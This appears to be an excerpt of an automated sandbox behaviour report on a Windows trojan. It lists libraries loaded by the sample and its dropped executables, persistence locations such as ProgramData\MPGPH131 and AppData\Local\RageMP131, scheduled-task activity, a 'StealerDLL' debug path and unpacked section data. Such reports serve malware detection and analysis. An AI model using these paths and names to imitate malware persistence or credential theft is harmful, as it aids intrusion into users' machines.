Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static file information: File size 3086848 > 1048576
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: Raw size of byqduimw is bigger than: 0x100000 < 0x2c1600
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 1.2.explorha.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 6.2.explorha.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW; vs :ER;.rsrc:W;.idata :W;byqduimw:EW;otarkcdf:EW;
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Unpacked PE file: 14.2.ad0e9cf6d6.exe.100000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 19.2.MPGPH131.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
